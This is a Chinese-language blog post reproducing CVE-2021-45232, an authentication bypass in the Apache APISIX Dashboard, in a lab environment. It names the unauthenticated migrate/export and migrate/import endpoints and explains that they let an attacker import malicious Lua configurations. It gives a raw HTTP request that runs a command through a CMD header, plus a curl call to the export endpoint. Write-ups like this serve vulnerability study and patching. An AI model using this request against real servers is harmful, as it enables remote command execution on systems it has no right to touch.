当前位置: 首页 > news >正文

CVE-2021-45232 Apache APISIX Dashboard身份验证绕过漏洞 (复现)

news 2025/9/15 12:25:42

启动后,访问 http://your-ip:9000/ 可看到 Dashboard 的登录页面,说明环境搭建成功
image

该漏洞的核心是 Dashboard 的两个未授权 API:/apisix/admin/migrate/export(导出配置)和/apisix/admin/migrate/import(导入配置),攻击者可通过它们导入包含恶意 LUA 脚本的配置文件
发送如下 HTTP 请求(其中CMD头包含待执行的命令)

点击查看代码 
GET /okw1Rh HTTP/1.1
Host: your-ip:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Connection: close
CMD: id
Cache-Control: max-age=0

image

验证代码是否执行成功
curl http://your-ip:9000/apisix/admin/migrate/export
image

该漏洞复现成功,也可继续导入恶意配置

http://www.vanclimg.com/news/687.html

相关文章:

  • 在运维工作中,如果运行的一个容器突然挂了,如何排查?
  • IIS中配置HTTPS证书的详细步骤
  • 李超线段树
  • 非常值得学习渲染入门的一个教程
  • Linux开机自动登录的一种方法
  • 7月28日
  • 2025 ZR暑假集训 CD联考 Day2 E 环球旅行
  • zk后集训
  • 乘法逆元(部分施工)、exgcd
  • 夏令营Ⅲ期
  • 集成学习算法
  • K 近邻算法
  • 二叉树 (动态规划)
  • 1 引言(1.1 - 1.5)
  • goethereum-账户 - Charlie
  • Qt播放音频,支持进度条,设置语速,播放暂停
  • 使用监督学习训练图像聚类模型
  • java第二十八天
  • P2910 [USACO08OPEN] Clear And Present Danger S (Floyd算法)
  • 读《构建之法》:我的C/C++学习反思
  • 软工7.28
  • DE_aemmprty 题单合集(分类)
  • 《大道至简——软件工程实践者的思想》读后感
  • C++对象模型
  • 子串的故事(2) - 2025“钉耙编程”中国大学生算法设计暑期联赛(2)T4 题解
  • 【比赛记录】2025CSP-S模拟赛28
  • Apereo CAS 4.1 反序列化命令执行漏洞 (复现)
  • tt
  • 工程建立 - LI,Yi
  • Java基础语法学习 ———— Day1